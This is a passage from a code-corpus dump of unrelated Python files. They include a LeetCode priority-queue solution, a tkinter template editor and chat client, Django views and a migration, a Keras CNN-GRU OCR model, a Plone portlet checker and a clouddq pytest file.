+{"seq_id":"241836145","text":"import math\nimport heapq\nfrom queue import PriorityQueue\nfrom typing import List\n\n# The main cause of the TLE was ordering every pair; in fact not all pairs need to be sorted.\n# The smallest sum is always at [1,1]; the 2nd/3rd smallest come from [1,2] or [2,1], and the 4th-6th\n# from [1,3], [2,2] or [3,1], so roughly the upper-left k*k triangle already yields the first k values.\n# Push one row at a time: first [1,1],...,[1,k], then [2,1],...,[2,k-1]; each pushed row is already\n# ascending, so no extra sorting is needed and in-queue ordering time drops.\n\n\ndef takesecond(elem):\n    return elem[1]\n\n\nclass Solution:\n    def kSmallestPairs(self, nums1: List[int], nums2: List[int], k: int) -> List[List[int]]:\n        n1 = len(nums1)\n        n2 = len(nums2)\n        # PriorityQueue pops entries in ascending order by default\n        pq = PriorityQueue()\n        ans = []\n        z = 1\n        for i in range(n1):\n            for j in range(n2):\n                pq.put((nums1[i] + nums2[j], z))\n                z += 1\n\n        if k > z - 1:\n            k = z - 1  # z ends one past the number of pairs\n        for i in range(k):\n            item = pq.get()\n            serial = float(item[1])\n            t1 = math.ceil(serial / n2)\n            t2 = int(serial) - (t1 - 1) * n2\n            ans.append([nums1[t1 - 1], nums2[t2 - 1]])\n\n        return ans\n\n    def optimize(self, nums1: List[int], nums2: List[int], k: int) -> List[List[int]]:\n        n1 = len(nums1)\n        n2 = len(nums2)\n        pq = PriorityQueue()\n        ans = []\n        for j in range(min(k, n2)):\n            pq.put((nums1[0] + nums2[j], 0, j))\n        while not pq.empty() and len(ans) < k:\n            _, i, j = pq.get()\n            ans.append([nums1[i], nums2[j]])\n            if i + 1 < n1:\n                pq.put((nums1[i + 1] + nums2[j], i + 1, j))\n        return ans\n\n\"\"\"\nclass Solution:\n    def kSmallestPairs(self, nums1: List[int], nums2: List[int], k: int) -> List[List[int]]:\n        m, n = len(nums1), len(nums2)\n        ans = []\n        pq = [(nums1[i] + nums2[0], i, 0) for i in range(min(k, m))]\n        while pq and len(ans) < k:\n            _, i, j = heappop(pq)\n            ans.append([nums1[i], nums2[j]])\n            if j + 1 < n:\n                heappush(pq, (nums1[i] + nums2[j + 1], i, j + 1))\n        return ans\n\"\"\"","sub_path":"373. 
查找和最小的 K 对数字/优先队列.py","file_name":"优先队列.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"414837734","text":"import os\nfrom tkinter import *\nfrom tkinter.ttk import *\nfrom tkinter import filedialog\nfrom sqlite3 import connect,Connection\nimport re\nimport string\n\ndemo_template_txt = \"\"\" This is the demo template.\nIn the data of a template, tokens for replacement are indicated \nusing first the dollar sign then curly braces surrounding an identifier.\n\n${like} ${this}.\n\n$${BUT} $not_in any of $$these_ways.\n\nIdentifiers are case sensitive, thus ${this} is different from ${THIS}.\n\nSwitch to the 'Entry' tab to enter values for the replacement of the tokens.\nUpon entering the replacement values, output is displayed in the bottom area.\nYou may copy it to the clipboard or save it as a file.\nIf entry named 'demo.template' is found in the database,\nthen it's data will be loaded at start.\nThe database file, which is created in the user's home folder,\nis named '.tktem.sqlitedb' on unixlike os\nor named '_tktem.sqlitedb' on windows os.\nYou may edit this template data and press the 'Save Template' button below.\nYou may import a template using the 'Template' menu above.\nYou may select from templates in the database using the combobox above.\nTo create a new template, enter a name into the combobox above\nand press return.\nRemember to press the 'Save Template' button when you are done editing\na template!\"\"\"\n\nclass Db(Connection):\n def __init__(self,name,**kw):\n pfix = '.'\n if os.sys.platform == 'win32':\n pfix = '_'\n dbname = os.path.join(os.path.expanduser('~'),pfix+\"tktem1.sqlitedb\")\n Connection.__init__(self,dbname,**kw)\n made = self.execute('select count(*) from sqlite_master').fetchone()[0]\n if not made:\n self.executescript('''\n create table if not exists templates (\n name, data default \"\",\n unique (name) on conflict ignore);''')\n self.commit()\n ct = self.execute('select count(*) from templates').fetchone()[0]\n if not ct:\n self.execute(\"insert into templates(name,data) values (?,?)\",(\"demo.template\",demo_template_txt))\n self.commit()\n\n\nclass Data:\n def __init__(self):\n self.template_name = StringVar()\n self.template_data = StringVar()\n self.output_data = StringVar()\n self.active_template = StringVar()\n self.entrydict = dict()\n\n\nclass Win(Tk):\n\n def __init__(self,master=None):\n Tk.__init__(self,master)\n self.cx = connect('the_database',factory=Db)\n self.data = Data()\n self.data.template_name.trace('w',self.template_name_change)\n self.data.template_data.trace('w',self.template_data_change)\n self.data.active_template.trace('w',self.active_template_change)\n self.createwidgets()\n self.data.template_name.set(\"demo.template\")\n self.window_setup()\n\n def createwidgets(self):\n self.head = Frame(self)\n self.tname = Label(self.head,textvariable=self.data.template_name)\n self.template_selector = Combobox(self.head, textvariable=self.data.active_template, postcommand=self.populate_tlist)\n self.body = LabelFrame(self,labelwidget=self.head)\n self.nbook = Notebook(self.body)\n self.nbtab1 = Frame(self.nbook)\n self.nbtab2 = Frame(self.nbook)\n self.nbook.insert(END,self.nbtab1,text='Template')\n self.nbook.insert(END,self.nbtab2,text='Entry')\n self.tframe = Frame(self.nbtab1)\n self.entry = Frame(self.nbtab2)\n self.datatext = Text(self.tframe)\n self.tdata_save = Button(self.tframe,text=\"Save 
Template\",command=self.save_tdata)\n self.odata_save = Button(self,text=\"Save Output\",command=self.save_output_data)\n self.oframe = Frame(self.body)\n self.odata_copy = Button(self.oframe,text=\"Copy to Clipboard\",command=self.copy_output_to_clipboard)\n self.output = LabelFrame(self.oframe,labelwidget=self.odata_save,labelanchor=SE)\n self.odata = Message(self.output,textvariable=self.data.output_data)\n self.body.pack(anchor=N,expand=True,fill=BOTH)\n self.template_selector.pack(side=LEFT)\n self.tname.pack(side=LEFT,pady=4)\n self.nbook.pack(anchor=N,expand=True,fill=BOTH)\n self.tframe.pack()\n self.datatext.pack()\n self.tdata_save.pack()\n self.entry.pack()\n self.oframe.pack(anchor=N,expand=True,fill=BOTH)\n self.odata_copy.pack()\n self.output.pack()\n self.odata.pack()\n self.nbook.bind('<>',self.nbook_tabchange)\n self.template_selector.bind('',self.refocus)\n #self.codeinspect_btn = Button(self,command=self.codeinspect)\n #self.codeinspect_btn.pack()\n\n #def codeinspect(self):\n # __import__('code').interact(local=dict(globals(), **locals()))\n\n def nbook_tabchange(self,e):\n self.update_output_data()\n\n def save_output_data(self):\n svfile = filedialog.asksaveasfilename(initialdir=os.path.expanduser(\"~\"))\n if svfile:\n odata = self.data.output_data.get().rstrip()\n with open(svfile,'w') as f:\n f.write(odata)\n print('saved to',svfile)\n\n def window_setup(self):\n w,h = self.winfo_screenwidth(),self.winfo_screenheight()\n self.geometry('%ix%i+%i+%i'%(w/2,h-84,(w/4),42))\n self.configure(padx=20,pady=20,border=0)\n self.deiconify()\n self.lift()\n self.call('wm', 'attributes', '.', '-topmost', True)\n self.after_idle(self.call,'wm','attributes','.','-topmost',False)\n if os.sys.platform == 'darwin':\n os.system(\"/usr/bin/osascript -e 'tell application \\\"Finder\\\"'\" +\n \" -e 'set frontmost of process \\\"Python\\\" to true'\" +\n \" -e 'end tell'\")\n\n def populate_tlist(self):\n tlist = [t[0] for t in self.cx.execute('select name from templates')]\n self.template_selector.config(values=tlist)\n\n def refocus(self,*a):\n self.head.focus()\n t = self.data.active_template.get()\n v = self.template_selector.config('values')[4]\n if len(t) and t not in v:\n self.cx.execute('insert into templates (name) values (?)',(t,))\n self.data.template_name.set(t)\n\n def copy_output_to_clipboard(self):\n odata = self.data.output_data.get().rstrip()\n self.clipboard_clear()\n self.clipboard_append(odata)\n\n def save_tdata(self):\n datatext = self.datatext.get('1.0',END)\n tname = self.data.template_name.get()\n self.cx.execute('update templates set data=? 
where name=?',(datatext,tname))\n self.cx.commit()\n\n def update_output_data(self):\n d = dict()\n datatext = self.datatext.get('1.0',END)\n matchls = list(re.findall(string.Template.pattern,datatext))\n braceds = set()\n for one,two,braced,four in matchls:\n if braced not in {'$',''}:\n braceds.add(braced)\n for m in sorted(braceds):\n if m not in self.data.entrydict:\n e_var = StringVar()\n e_var.trace('w',self.entry_keypress_update)\n entrylabel = Label(self.entry,text=m)\n entry = Entry(self.entry,textvariable=e_var)\n self.data.entrydict[m] = {\"ev\":e_var,\"en\":entry,\"el\":entrylabel}\n d[m] = self.data.entrydict[m][\"ev\"].get()\n dvn = [vn for vn in self.data.entrydict if vn not in braceds]\n for vn in dvn:\n dv = self.data.entrydict[vn]\n for dvt in ['el','en']:\n dv[dvt].destroy()\n del self.data.entrydict[vn]\n for i,e in enumerate(sorted(self.data.entrydict)):\n self.data.entrydict[e]['el'].grid(row=i,column=0,sticky=E+W,padx=4,pady=1,ipadx=4,ipady=1)\n self.data.entrydict[e]['en'].grid(row=i,column=1,sticky=E+W,padx=2,pady=2,ipadx=2,ipady=2)\n self.data.output_data.set(string.Template(datatext).safe_substitute(**d))\n\n def entry_keypress_update(self,*e):\n self.update_output_data()\n\n def template_data_change(self,*a):\n self.datatext.delete('1.0',END)\n tdata = self.data.template_data.get()\n self.datatext.insert('1.0',tdata.rstrip())\n self.update_output_data()\n\n def template_name_change(self,*a):\n tname = self.data.template_name.get()\n self.title(tname)\n data = self.cx.execute('select data from templates where name=?',(tname,)).fetchone()[0]\n self.data.template_data.set(data)\n at = self.data.active_template.get()\n if at != tname:\n self.data.active_template.set(tname)\n\n def active_template_change(self,*a):\n t = self.data.active_template.get()\n if t in self.template_selector.config('values')[4]:\n ot = self.data.template_name.get()\n if t != ot:\n self.data.template_name.set(t)\n return True\n\nwin = Win()\ns = Style()\ncomd = dict(borderwidth=2,ipadx=10,ipady=10,padx=10,pady=10)\ns.configure('TFrame',**comd)\ns.configure('TLabelFrame',**comd)\ns.configure('TNotebook',**comd)\nwin.mainloop()\n","sub_path":"tktem.py","file_name":"tktem.py","file_ext":"py","file_size_in_byte":9100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"319648086","text":"from django.shortcuts import render, HttpResponseRedirect\nfrom demo.models import Department, Employee\nfrom demo.orm_forms import AddDeptForm, AddEmpForm\n\n\ndef list_emp(request):\n emps = Employee.objects.all()\n return render(request, 'demo/orm/list_emp.html', {\"emps\": emps})\n\n\ndef emp_by_dept(request, id):\n emps = Employee.objects.filter(department=id)\n return render(request, 'demo/orm/list_emp.html', {\"emps\": emps})\n\n\ndef add_emp(request):\n if request.method == \"POST\":\n form = AddEmpForm(request.POST)\n if form.is_valid():\n form.save() # insert row into Employees table\n return HttpResponseRedirect(\"/demo/orm/home\")\n else:\n form = AddEmpForm()\n\n return render(request, 'demo/orm/add_emp.html', {\"form\": form})\n\n\ndef add_dept(request):\n if request.method == \"POST\":\n form = AddDeptForm(request.POST)\n if form.is_valid():\n form.save() # insert row into Departments table\n return HttpResponseRedirect(\"/demo/orm/home\")\n else:\n form = AddDeptForm()\n\n return render(request, 'demo/orm/add_dept.html', {\"form\": form})\n\n\ndef home(request):\n dept_count = Department.objects.count()\n emp_count = Employee.objects.count()\n 
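# aggregate counts for the dashboard template\n    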
return render(request, 'demo/orm/home.html',\n {\"dept_count\": dept_count,\n \"emp_count\": emp_count})\n\n\ndef list_dept(request):\n depts = Department.objects.all()\n return render(request, 'demo/orm/list_dept.html', {\"depts\": depts})\n","sub_path":"demo/orm_views.py","file_name":"orm_views.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"289126701","text":"import pandas as pd \n\ndf = pd.read_csv(\"./wikivoyage-listings-en.csv\")\n\ncities = {}\n\nfor a in df['article']:\n\tif a in cities.keys():\n\t\tcontinue\n\tcities[a] = 1\n\ndistribution = {}\nfor t in df['type']:\n\tif t not in distribution.keys():\n\t\tdistribution[t] = 1\n\tdistribution[t] += 1\n\ndef get_data_by_city(city, df):\n\tstart_index = 0\n\tend_index = 0\n\tfound = False\n\tfor i,a in enumerate(df['article']):\n\t\tif city.lower() in a.lower() and not found:\n\t\t\tstart_index = i\n\t\t\tfound = True\n\t\tif found and city.lower() not in a.lower():\n\t\t\tend_index = i\n\t\t\tbreak\n\treturn df[start_index:end_index]\n\ndef slice_by_type(place_type, df):\n\ttype_df = df[df['type'] == place_type]\n\treturn type_df\n\nprint(distribution)\nny = get_data_by_city('detroit', df)\nprint(ny.shape)\nne = slice_by_type('drink', ny)\nprint(ne.shape)\n","sub_path":"explore.py","file_name":"explore.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"520201219","text":"#!/usr/bin/env python3\n# coding=utf-8\n\nimport os, sys\nimport subprocess\nfrom subprocess import Popen, PIPE\n\ncmd = 'gmx -quiet -nobackup energy -f %s -b %s' % (sys.argv[1], sys.argv[3])\n\nprop_str = sys.argv[2]\nsp = Popen(cmd.split(), stdout=PIPE, stdin=PIPE, stderr=PIPE)\nsp_out = sp.communicate(input=prop_str.encode())[0]\n\nfor line in sp_out.decode().splitlines():\n if line.lower().startswith(prop_str.lower()):\n words = line.split()\n ave = float(words[1])\n stderr = float(words[2])\n\nif prop_str.lower().startswith('#sur'):\n ave /= 20\n stderr /= 20\n\nif prop_str.lower().startswith('dens'):\n ave /= 1000\n stderr /= 1000\n\nprint(ave, stderr)\n\n","sub_path":"scripts/gmx-get-property.py","file_name":"gmx-get-property.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"419874464","text":"\nfrom keras import backend as K\nfrom keras.layers.convolutional import Conv2D, MaxPooling2D\nfrom keras.layers import Input, Dense, Activation\nfrom keras.layers import Reshape, Lambda\nfrom keras.layers import Dropout\nfrom keras.layers.merge import add, concatenate\nfrom keras.models import Model\nfrom keras.layers.recurrent import GRU\nfrom keras.optimizers import SGD\nimport keras.callbacks\nimport ctc_drop_first_2\n\n\ndef make_model(img_w, img_h, output_size, absolute_max_string_len):\n\n # Network parameters\n conv_filters = 16\n #conv_filters = 32 # experiment 2\n kernel_size = (3, 3)\n time_dense_size = 32\n rnn_size = 512\n pool_size = 2\n\n if K.image_data_format() == 'channels_first':\n input_shape = (1, img_w, img_h)\n else:\n input_shape = (img_w, img_h, 1)\n\n act = 'relu'\n input_data = Input(name='the_input', shape=input_shape, dtype='float32')\n type_of_model = \"original\" # \"https://keras.io/examples/mnist_cnn/\"\n if type_of_model == \"https://keras.io/examples/mnist_cnn/\":\n inner = Conv2D(32, kernel_size, padding='same',\n activation=act, 
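# he_normal initialization is a common pairing with relu activations\n                   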
kernel_initializer='he_normal',\n name='conv1')(input_data)\n inner = MaxPooling2D(pool_size=(pool_size, pool_size), name='max1')(inner)\n inner = Conv2D(64, kernel_size, padding='same',\n activation=act, kernel_initializer='he_normal',\n name='conv2')(inner)\n inner = MaxPooling2D(pool_size=(pool_size, pool_size), name='max2')(inner)\n inner = Dropout(0.25)(inner) # Fraction of the input units to drop\n conv_filters = 64\n else:\n inner = Conv2D(conv_filters, kernel_size, padding='same',\n activation=act, kernel_initializer='he_normal',\n name='afilter'+str(conv_filters))(input_data)\n inner = MaxPooling2D(pool_size=(pool_size, pool_size), name='apool'+str(pool_size)+\"by\"+str(pool_size))(inner)\n inner = Conv2D(conv_filters, kernel_size, padding='same',\n activation=act, kernel_initializer='he_normal',\n name='bfilter'+str(conv_filters))(inner)\n inner = MaxPooling2D(pool_size=(pool_size, pool_size), name='bpool'+str(pool_size)+\"by\"+str(pool_size))(inner)\n # experiment 3b ... add dropout\n #inner = Dropout(0.5)(inner) # Fraction of the input units to drop\n # experiment 3c ... add dropout\n inner = Dropout(0.25)(inner) # Fraction of the input units to drop\n\n # image is down sampled by MaxPooling twice, hence pool_size ** 2\n conv_to_rnn_dims = (img_w // (pool_size ** 2), (img_h // (pool_size ** 2)) * conv_filters)\n inner = Reshape(target_shape=conv_to_rnn_dims, name='reshape')(inner)\n\n # cuts down input size going into RNN:\n # experiment 3 removes this reduction\n #inner = Dense(time_dense_size, activation=act, name='dense1')(inner)\n\n if type_of_model == \"https://keras.io/examples/mnist_cnn/\":\n inner = Dropout(0.5)(inner)\n\n # Two layers of bidirectional GRUs\n # GRU seems to work as well, if not better than LSTM:\n gru_1 = GRU(rnn_size, return_sequences=True, kernel_initializer='he_normal', name='gru1')(inner)\n gru_1b = GRU(rnn_size, return_sequences=True, go_backwards=True, kernel_initializer='he_normal', name='gru1_b')(inner)\n gru1_merged = add([gru_1, gru_1b])\n gru_2 = GRU(rnn_size, return_sequences=True, kernel_initializer='he_normal', name='gru2')(gru1_merged)\n gru_2b = GRU(rnn_size, return_sequences=True, go_backwards=True, kernel_initializer='he_normal', name='gru2_b')(gru1_merged)\n\n # transforms RNN output to character activations:\n inner = Dense(output_size, kernel_initializer='he_normal',\n name='dense2')(concatenate([gru_2, gru_2b]))\n y_pred = Activation('softmax', name='softmax')(inner)\n\n # this intermediate point is usefull for predictions without training\n model_p = Model(inputs=input_data, outputs=y_pred)\n \n labels = Input(name='the_labels', shape=[absolute_max_string_len], dtype='float32')\n input_length = Input(name='input_length', shape=[1], dtype='int64')\n label_length = Input(name='label_length', shape=[1], dtype='int64')\n \n # Keras doesn't currently support loss funcs with extra parameters\n # so CTC loss is implemented in a lambda layer\n \n # K.Lambda wraps arbitrary expression as a Layer object.\n # Q then its called ?\n loss_out = Lambda(ctc_drop_first_2.ctc_lambda_func, output_shape=(1,), name='ctc')([y_pred, labels, input_length, label_length])\n\n\n\n model = Model(inputs=[input_data, labels, input_length, label_length], outputs=loss_out)\n \n return (model, model_p, input_data, y_pred)\n\n\n\n \n\n \n","sub_path":"src/cnn_rnn_model.py","file_name":"cnn_rnn_model.py","file_ext":"py","file_size_in_byte":4719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} 
+{"seq_id":"153969751","text":"import threading\nimport time\ndef myfunc():\n print(\"Start a thread!\\n\")\n time.sleep(3)\n print(\"End a thread!!\\n\")\nthreads=[]\nfor i in range(5):\n th = threading.Thread(target=myfunc)\n th.start()\n threads.append(th)\nfor th in threads:\n th.join()\n","sub_path":"T_threads.py","file_name":"T_threads.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"642054855","text":"from socket import AF_INET, SOCK_STREAM, socket\nfrom threading import Thread, Lock\nimport tkinter as tk\nfrom configparser import *\nfrom helpers import unwrap_netstring\nfrom time import sleep\n\n\nclass SocketClient():\n def __init__(self, master, canvas):\n self.master = master\n self.canvas = canvas\n self.queue = []\n self.lock = Lock()\n self.token = False\n self.word = ''\n self.freeplay = False\n\n Config = ConfigParser()\n Config.read('config.ini')\n\n self.nick = Config.get('Config', 'Nickname')[:12]\n HOST = Config.get('Config', 'Host')\n PORT = int(Config.get('Config', 'Port'))\n\n self.ADDR = (HOST, PORT)\n self.BUFSIZ = 512\n\n self.force_close = False\n\n def connect(self):\n self.client_socket = socket(AF_INET, SOCK_STREAM)\n self.client_socket.connect(self.ADDR)\n\n data_string = 'usr:' + str(len(self.nick)) + ':' + self.nick\n self.client_socket.sendall(bytes(data_string, 'utf8'))\n\n self.my_msg = tk.StringVar()\n\n Thread(target=self.listen, daemon=True).start()\n # Thread(target=self.handle, daemon=True).start()\n\n def get_chat_window(self):\n frame = tk.Frame(self.master)\n\n scrollbar = tk.Scrollbar(frame)\n scrollbar.pack(side=tk.RIGHT, fill=tk.Y)\n\n self.msg_list = tk.Listbox(\n frame,\n height=25,\n width=50,\n yscrollcommand=scrollbar.set,\n font=('TkFixedFont', 14)\n )\n\n self.msg_list.pack(fill=tk.X)\n\n frame.pack(fill=tk.BOTH)\n\n return frame\n\n def get_entry_frame(self):\n frame = tk.Frame(self.master)\n\n entry_field = tk.Entry(frame, textvariable=self.my_msg)\n entry_field.bind('', self.send)\n entry_field.pack(fill=tk.X)\n\n send_button = tk.Button(frame, text='Send', command=self.send)\n send_button.pack(fill=tk.X)\n\n return frame\n\n def listen(self):\n while True:\n try:\n data = self.client_socket.recv(self.BUFSIZ).decode('utf8')\n Thread(target=self.handle, args=(data,), daemon=True).start()\n\n except OSError:\n print('Client connection broken.')\n break\n\n def handle(self, data):\n lst = unwrap_netstring(data)\n\n for mtype, msg in lst:\n print('RECEIVED', mtype, msg)\n\n if mtype == 'msg':\n self.msg_list.insert(tk.END, msg)\n self.msg_list.select_clear(self.msg_list.size() - 2)\n self.msg_list.select_set(tk.END)\n self.msg_list.yview(tk.END)\n\n elif mtype == 'can':\n self.canvas.update_canvas(msg, self.freeplay)\n\n elif mtype == 'tok':\n if self.token:\n self.lock.acquire()\n self.word = msg\n self.msg_list.insert(tk.END, 'Your word: %s.' % msg)\n self.msg_list.select_clear(self.msg_list.size() - 2)\n self.msg_list.select_set(tk.END)\n self.msg_list.yview(tk.END)\n self.lock.release()\n else:\n self.lock.acquire()\n self.token = True\n self.reset_all_to_defaults()\n Thread(target=self.send_canvas, daemon=True).start()\n self.canvas.allow_drawing()\n self.word = msg\n self.msg_list.insert(tk.END, 'Your word: %s.' 
% msg)\n self.msg_list.select_clear(self.msg_list.size() - 2)\n self.msg_list.select_set(tk.END)\n self.msg_list.yview(tk.END)\n self.lock.release()\n\n elif mtype == 'rev':\n self.word = ''\n self.token = False\n self.canvas.disallow_drawing()\n\n elif mtype == 'clr':\n self.canvas.destroy_canvas()\n\n elif mtype == 'fpe':\n if self.token is not True:\n self.lock.acquire()\n self.token = True\n self.freeplay = True\n Thread(target=self.send_canvas, daemon=True).start()\n self.canvas.allow_drawing()\n self.msg_list.insert(tk.END, 'Free play enabled.')\n self.msg_list.select_clear(self.msg_list.size() - 2)\n self.msg_list.select_set(tk.END)\n self.msg_list.yview(tk.END)\n self.lock.release()\n\n elif mtype == 'fpd':\n if self.token is True:\n self.lock.acquire()\n self.token = False\n self.freeplay = False\n Thread(target=self.send_canvas, daemon=True).start()\n self.canvas.disallow_drawing()\n self.msg_list.insert(tk.END, 'Free play disabled.')\n self.msg_list.select_clear(self.msg_list.size() - 2)\n self.msg_list.select_set(tk.END)\n self.msg_list.yview(tk.END)\n self.lock.release()\n\n else:\n print('Unknown mtype: %s, msg: %s' % (mtype, msg))\n\n def reset_all_to_defaults(self):\n color = self.canvas.painter.color\n length = str(len(color) + 1)\n msg = 'can:%s:c%s' % (length, color)\n\n brush = self.canvas.painter.brush\n length = str(len(str(brush)) + 1)\n msg += 'can:%s:b%s' % (length, str(brush))\n\n self.client_socket.sendall(bytes(msg, 'utf8'))\n\n def send_canvas(self):\n while self.token:\n if self.canvas.painter.obj:\n data = self.canvas.painter.obj.pop(0)\n self.client_socket.sendall(bytes(data, 'utf8'))\n\n def clear_canvas(self):\n if self.canvas.is_drawing():\n self.client_socket.sendall(bytes('clr:0:', 'utf8'))\n\n def reroll(self):\n if self.canvas.is_drawing():\n self.client_socket.sendall(bytes('rrl:0:', 'utf8'))\n\n def forfeit(self):\n if self.canvas.is_drawing():\n self.client_socket.sendall(bytes('fft:0:', 'utf8'))\n\n def default(self):\n self.canvas.restore_defaults()\n if self.canvas.is_drawing():\n self.client_socket.sendall(bytes('can:8:c#000000', 'utf8'))\n self.client_socket.sendall(bytes('can:2:b1', 'utf8'))\n\n def send(self, event=None):\n msg = self.my_msg.get()[:20]\n self.my_msg.set('')\n\n if msg == '{clear}':\n self.msg_list.delete(5, tk.END)\n msg = ''\n\n if self.token and self.word.lower() in msg.lower() and self.word != '':\n msg = ''\n\n if msg != '':\n netstring = 'msg:' + str(len(msg)) + ':' + msg\n try:\n self.client_socket.sendall(bytes(netstring, 'utf8'))\n if msg == '{quit}':\n self.client_socket.close()\n self.master.quit()\n except BrokenPipeError:\n self.lock.acquire()\n self.force_close = True\n self.lock.release()\n self.close()\n\n def close(self):\n if self.force_close:\n self.master.quit()\n else:\n self.my_msg.set('{quit}')\n self.send()\n self.force_close = True\n","sub_path":"chat.py","file_name":"chat.py","file_ext":"py","file_size_in_byte":7438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"189879496","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Article',\n fields=[\n ('id', models.AutoField(serialize=False, verbose_name='ID', auto_created=True, primary_key=True)),\n ('public', models.BooleanField(default=False)),\n ('title', models.CharField(max_length=20)),\n ('content', 
models.TextField()),\n ('publish_time', models.DateTimeField(auto_now_add=True)),\n ('update_time', models.DateTimeField(auto_now=True)),\n ],\n options={\n 'ordering': ['-update_time'],\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Message',\n fields=[\n ('id', models.AutoField(serialize=False, verbose_name='ID', auto_created=True, primary_key=True)),\n ('content', models.CharField(max_length=1000)),\n ('send_time', models.DateTimeField(auto_now_add=True)),\n ],\n options={\n 'ordering': ['-send_time'],\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Tag',\n fields=[\n ('id', models.AutoField(serialize=False, verbose_name='ID', auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=20)),\n ('num', models.IntegerField(default=0)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='User',\n fields=[\n ('id', models.AutoField(serialize=False, verbose_name='ID', auto_created=True, primary_key=True)),\n ('username', models.CharField(max_length=15)),\n ('password', models.CharField(max_length=16)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='tag',\n name='user',\n field=models.ForeignKey(related_name='userTag_set', to='record.User'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='message',\n name='user',\n field=models.ForeignKey(related_name='userMessage_set', to='record.User'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='article',\n name='tag',\n field=models.ForeignKey(related_name='tagArticle_set', to='record.Tag'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='article',\n name='user',\n field=models.ForeignKey(related_name='userArticle_set', to='record.User'),\n preserve_default=True,\n ),\n ]\n","sub_path":"record/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":3029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"269324071","text":"from Products.CMFCore.utils import getToolByName\n\ntry:\n from zope.app.component.hooks import getSite\nexcept ImportError:\n from zope.component.hooks import getSite\n\nfrom agsci.w3c.site import translateURL\nfrom agsci.subsite.events import getPortletAssignmentMapping\n\ndef findBrokenPortlets(context, types=['Document', 'HomePage', 'Folder', 'Blog', 'Subsite', 'Section', 'Topic', 'Newsletter', 'Blog']):\n site = getSite()\n search_path = \"/\".join(context.getPhysicalPath())\n\n portal_catalog = getToolByName(site, \"portal_catalog\")\n urltool = getToolByName(site, \"portal_url\")\n \n results = portal_catalog.searchResults({'portal_type' : types, 'path' : search_path})\n \n portlet_managers = ['plone.leftcolumn', 'plone.rightcolumn', 'agcommon.centercolumn', 'agcommon.rightcolumn']\n \n broken = []\n \n for r in results:\n o = r.getObject()\n for i in portlet_managers:\n pm = getPortletAssignmentMapping(o, i)\n for pid in pm.keys():\n p = pm[pid]\n klass = str(p.__class__)\n path = \"\"\n feeds = \"\"\n portlet_type = \"\"\n found = False\n if 'plone.portlet.collection.collection.Assignment' in klass:\n path = p.target_collection\n found = True\n title = p.title\n portlet_type = \"Collection\"\n elif 'collective.portlet.feedmixer.portlet.Assignment' in klass:\n path = p.target_collection\n found = True\n title = p.title\n if p.feeds:\n feeds = \"|\".join(p.feeds.split())\n portlet_type = \"Feedmixer\"\n elif 
'plone.app.portlets.portlets.navigation.Assignment' in klass:\n path = p.root\n found = True\n title = p.name\n portlet_type = \"Navigation\"\n if path:\n if path.startswith('/'):\n path = path.replace('/', '', 1)\n try:\n target = site.restrictedTraverse(path)\n except (AttributeError, KeyError):\n broken.append([\"BROKEN URL\", translateURL(o, https=True), title, path, i, klass])\n if found and feeds:\n broken.append([\"MANUAL CHECK\", translateURL(o, https=True), title, feeds, i, klass])\n \n return broken\n","sub_path":"agsci/w3c/portlet.py","file_name":"portlet.py","file_ext":"py","file_size_in_byte":2533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"368649399","text":"# Copyright 2021 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport pytest\n\nfrom clouddq.classes.dq_entity import get_custom_entity_configs\n\nfrom clouddq.classes.dq_entity import DqEntity\nfrom clouddq.classes.dq_row_filter import DqRowFilter\nfrom clouddq.classes.dq_rule import DqRule\nfrom clouddq.classes.dq_rule_binding import DqRuleBinding\n\nfrom clouddq.classes.rule_type import RuleType\n\n\nclass TestClasses:\n\n def test_dq_rule_parse_failure(self):\n \"\"\" \"\"\"\n with pytest.raises(ValueError):\n DqRule.from_dict(\n rule_id=\"valid\",\n kwargs={\n \"rule_type\": \"\",\n },\n )\n\n def test_dq_entity_missing_columns_failure(self):\n \"\"\" \"\"\"\n dq_entity_dict_not_valid = {\n \"source_database\": \"BIGQUERY\",\n \"table_name\": \"valid\",\n \"database_name\": \"valid\",\n \"instance_name\": \"valid\",\n }\n with pytest.raises(ValueError):\n DqEntity.from_dict(entity_id=\"valid\", kwargs=dq_entity_dict_not_valid)\n\n def 